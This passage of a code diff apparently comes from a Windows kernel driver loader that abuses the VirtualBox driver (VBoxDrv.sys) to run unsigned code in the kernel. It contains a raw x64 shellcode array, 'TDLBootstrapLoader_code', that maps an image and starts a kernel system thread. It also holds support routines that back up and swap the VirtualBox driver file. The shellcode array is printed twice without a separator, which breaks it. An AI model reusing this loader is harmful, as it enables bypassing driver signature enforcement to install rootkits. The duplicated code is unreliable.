((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
}
*/
static const unsigned char TDLBootstrapLoader_code[415] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
};

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: SUP.C
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -25,43 +25,43 @@
*
*/
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS InfoClass
)
_In_ SYSTEM_INFORMATION_CLASS InfoClass
)
{
INT c = 0;
PVOID Buffer = NULL;
ULONG Size = 0x1000;
NTSTATUS status;
ULONG memIO;
PVOID hHeap = NtCurrentPeb()->ProcessHeap;
INT c = 0;
PVOID Buffer = NULL;
ULONG Size = 0x1000;
NTSTATUS status;
ULONG memIO;
PVOID hHeap = NtCurrentPeb()->ProcessHeap;
do {
Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
if (Buffer != NULL) {
status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
}
else {
return NULL;
}
if (status == STATUS_INFO_LENGTH_MISMATCH) {
RtlFreeHeap(hHeap, 0, Buffer);
Size *= 2;
c++;
if (c > 100) {
status = STATUS_SECRET_TOO_LONG;
break;
}
}
} while (status == STATUS_INFO_LENGTH_MISMATCH);
do {
Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
if (Buffer != NULL) {
status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
}
else {
return NULL;
}
if (status == STATUS_INFO_LENGTH_MISMATCH) {
RtlFreeHeap(hHeap, 0, Buffer);
Size *= 2;
c++;
if (c > 100) {
status = STATUS_SECRET_TOO_LONG;
break;
}
}
} while (status == STATUS_INFO_LENGTH_MISMATCH);
if (NT_SUCCESS(status)) {
return Buffer;
}
if (NT_SUCCESS(status)) {
return Buffer;
}
if (Buffer) {
RtlFreeHeap(hHeap, 0, Buffer);
}
return NULL;
if (Buffer) {
RtlFreeHeap(hHeap, 0, Buffer);
}
return NULL;
}
/*
@ -73,19 +73,19 @@ PVOID supGetSystemInfo(
*
*/
ULONG_PTR supGetNtOsBase(
VOID
)
VOID
)
{
PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0;
PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0;
miSpace = supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
break;
}
return NtOsBase;
miSpace = supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
break;
}
return NtOsBase;
}
/*
@ -97,34 +97,34 @@ ULONG_PTR supGetNtOsBase(
*
*/
PBYTE supQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
)
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
)
{
NTSTATUS status;
ULONG_PTR IdPath[3];
IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
PBYTE Data = NULL;
ULONG SizeOfData = 0;
NTSTATUS status;
ULONG_PTR IdPath[3];
IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
PBYTE Data = NULL;
ULONG SizeOfData = 0;
if (DllHandle != NULL) {
if (DllHandle != NULL) {
IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
IdPath[1] = ResourceId; //id
IdPath[2] = 0; //lang
IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
IdPath[1] = ResourceId; //id
IdPath[2] = 0; //lang
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
}
}
}
}
return Data;
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
}
}
}
}
return Data;
}
/*
@ -136,39 +136,39 @@ PBYTE supQueryResourceData(
*
*/
BOOL supBackupVBoxDrv(
_In_ BOOL bRestore
)
_In_ BOOL bRestore
)
{
BOOL bResult = FALSE;
WCHAR szOldDriverName[MAX_PATH * 2];
WCHAR szNewDriverName[MAX_PATH * 2];
WCHAR szDriverDirName[MAX_PATH * 2];
BOOL bResult = FALSE;
WCHAR szOldDriverName[MAX_PATH * 2];
WCHAR szNewDriverName[MAX_PATH * 2];
WCHAR szDriverDirName[MAX_PATH * 2];
if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
return FALSE;
}
if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
return FALSE;
}
_strcat(szDriverDirName, TEXT("\\drivers\\"));
_strcat(szDriverDirName, TEXT("\\drivers\\"));
if (bRestore) {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
if (PathFileExists(szOldDriverName)) {
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
}
else {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
return bResult;
if (bRestore) {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
if (PathFileExists(szOldDriverName)) {
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
}
else {
_strcpy(szOldDriverName, szDriverDirName);
_strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
_strcpy(szNewDriverName, szDriverDirName);
_strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
bResult = MoveFileEx(szOldDriverName, szNewDriverName,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
return bResult;
}
/*
@ -180,93 +180,93 @@ BOOL supBackupVBoxDrv(
*
*/
SIZE_T supWriteBufferToFile(
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
)
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
)
{
NTSTATUS Status;
DWORD dwFlag;
HANDLE hFile = NULL;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING NtFileName;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER Position;
ACCESS_MASK DesiredAccess;
PLARGE_INTEGER pPosition = NULL;
ULONG_PTR nBlocks, BlockIndex;
ULONG BlockSize, RemainingSize;
PBYTE ptr = (PBYTE)Buffer;
SIZE_T BytesWritten = 0;
NTSTATUS Status;
DWORD dwFlag;
HANDLE hFile = NULL;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING NtFileName;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER Position;
ACCESS_MASK DesiredAccess;
PLARGE_INTEGER pPosition = NULL;
ULONG_PTR nBlocks, BlockIndex;
ULONG BlockSize, RemainingSize;
PBYTE ptr = (PBYTE)Buffer;
SIZE_T BytesWritten = 0;
if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
return 0;
if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
return 0;
DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
dwFlag = FILE_OVERWRITE_IF;
DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
dwFlag = FILE_OVERWRITE_IF;
if (Append == TRUE) {
DesiredAccess |= FILE_READ_ACCESS;
dwFlag = FILE_OPEN_IF;
}
if (Append != FALSE) {
DesiredAccess |= FILE_READ_ACCESS;
dwFlag = FILE_OPEN_IF;
}
InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
__try {
Status = NtCreateFile(&hFile, DesiredAccess, &attr,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
__try {
Status = NtCreateFile(&hFile, DesiredAccess, &attr,
&IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
if (!NT_SUCCESS(Status))
__leave;
if (!NT_SUCCESS(Status))
__leave;
pPosition = NULL;
pPosition = NULL;
if (Append == TRUE) {
Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
Position.HighPart = -1;
pPosition = &Position;
}
if (Append != FALSE) {
Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
Position.HighPart = -1;
pPosition = &Position;
}
if (Size < 0x80000000) {
BlockSize = (ULONG)Size;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
if (Size < 0x80000000) {
BlockSize = (ULONG)Size;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
else {
BlockSize = 0x7FFFFFFF;
nBlocks = (Size / BlockSize);
for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
BytesWritten += IoStatus.Information;
}
else {
BlockSize = 0x7FFFFFFF;
nBlocks = (Size / BlockSize);
for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
ptr += BlockSize;
BytesWritten += IoStatus.Information;
}
RemainingSize = Size % BlockSize;
if (RemainingSize != 0) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
}
}
__finally {
if (hFile != NULL) {
if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus);
NtClose(hFile);
}
RtlFreeUnicodeString(&NtFileName);
}
return BytesWritten;
ptr += BlockSize;
BytesWritten += IoStatus.Information;
}
RemainingSize = (ULONG)(Size % BlockSize);
if (RemainingSize != 0) {
Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
if (!NT_SUCCESS(Status))
__leave;
BytesWritten += IoStatus.Information;
}
}
}
__finally {
if (hFile != NULL) {
if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus);
NtClose(hFile);
}
RtlFreeUnicodeString(&NtFileName);
}
return BytesWritten;
}
/*
@ -278,30 +278,30 @@ SIZE_T supWriteBufferToFile(
*
*/
NTSTATUS NTAPI supDetectObjectCallback(
_In_ POBJECT_DIRECTORY_INFORMATION Entry,
_In_ PVOID CallbackParam
)
_In_ POBJECT_DIRECTORY_INFORMATION Entry,
_In_ PVOID CallbackParam
)
{
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
return STATUS_INVALID_PARAMETER_1;
}
if (Entry == NULL) {
return STATUS_INVALID_PARAMETER_1;
}
if (CallbackParam == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
if (CallbackParam == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Entry->Name.Buffer) {
if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
if (Entry->Name.Buffer) {
if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
}
/*
@ -313,87 +313,87 @@ NTSTATUS NTAPI supDetectObjectCallback(
*
*/
NTSTATUS NTAPI supEnumSystemObjects(
_In_opt_ LPWSTR pwszRootDirectory,
_In_opt_ HANDLE hRootDirectory,
_In_ PENUMOBJECTSCALLBACK CallbackProc,
_In_opt_ PVOID CallbackParam
)
_In_opt_ LPWSTR pwszRootDirectory,
_In_opt_ HANDLE hRootDirectory,
_In_ PENUMOBJECTSCALLBACK CallbackProc,
_In_opt_ PVOID CallbackParam
)
{
BOOL cond = TRUE;
ULONG ctx, rlen;
HANDLE hDirectory = NULL;
NTSTATUS status;
NTSTATUS CallbackStatus;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING sname;
BOOL cond = TRUE;
ULONG ctx, rlen;
HANDLE hDirectory = NULL;
NTSTATUS status;
NTSTATUS CallbackStatus;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING sname;
POBJECT_DIRECTORY_INFORMATION objinf;
POBJECT_DIRECTORY_INFORMATION objinf;
if (CallbackProc == NULL) {
return STATUS_INVALID_PARAMETER_4;
}
if (CallbackProc == NULL) {
return STATUS_INVALID_PARAMETER_4;
}
status = STATUS_UNSUCCESSFUL;
status = STATUS_UNSUCCESSFUL;
__try {
__try {
// We can use root directory.
if (pwszRootDirectory != NULL) {
RtlSecureZeroMemory(&sname, sizeof(sname));
RtlInitUnicodeString(&sname, pwszRootDirectory);
InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
if (!NT_SUCCESS(status)) {
return status;
}
}
else {
if (hRootDirectory == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
hDirectory = hRootDirectory;
}
// We can use root directory.
if (pwszRootDirectory != NULL) {
RtlSecureZeroMemory(&sname, sizeof(sname));
RtlInitUnicodeString(&sname, pwszRootDirectory);
InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
if (!NT_SUCCESS(status)) {
return status;
}
}
else {
if (hRootDirectory == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
hDirectory = hRootDirectory;
}
// Enumerate objects in directory.
ctx = 0;
do {
// Enumerate objects in directory.
ctx = 0;
do {
rlen = 0;
status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
rlen = 0;
status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;
status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
break;
}
status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
if (!NT_SUCCESS(status)) {
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
break;
}
CallbackStatus = CallbackProc(objinf, CallbackParam);
CallbackStatus = CallbackProc(objinf, CallbackParam);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
if (NT_SUCCESS(CallbackStatus)) {
status = STATUS_SUCCESS;
break;
}
if (NT_SUCCESS(CallbackStatus)) {
status = STATUS_SUCCESS;
break;
}
} while (cond);
} while (cond);
if (hDirectory != NULL) {
NtClose(hDirectory);
}
if (hDirectory != NULL) {
NtClose(hDirectory);
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
status = STATUS_ACCESS_VIOLATION;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
status = STATUS_ACCESS_VIOLATION;
}
return status;
return status;
}
/*
@ -405,18 +405,18 @@ NTSTATUS NTAPI supEnumSystemObjects(
*
*/
BOOL supIsObjectExists(
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
)
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
)
{
OBJSCANPARAM Param;
OBJSCANPARAM Param;
if (ObjectName == NULL) {
return FALSE;
}
if (ObjectName == NULL) {
return FALSE;
}
Param.Buffer = ObjectName;
Param.BufferSize = (ULONG)_strlen(ObjectName);
Param.Buffer = ObjectName;
Param.BufferSize = (ULONG)_strlen(ObjectName);
return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
}

View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: SUP.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* Common header file for the program support routines.
*
@ -21,39 +21,39 @@
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
ULONG BufferSize;
PWSTR Buffer;
ULONG BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
ULONG_PTR supGetNtOsBase(
VOID
);
VOID
);
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS InfoClass
);
_In_ SYSTEM_INFORMATION_CLASS InfoClass
);
PBYTE supQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
);
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
);
BOOL supBackupVBoxDrv(
_In_ BOOL bRestore
);
_In_ BOOL bRestore
);
SIZE_T supWriteBufferToFile(
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
);
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
);
BOOL supIsObjectExists(
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
);
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
);
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)

View File

@ -1,29 +1,36 @@
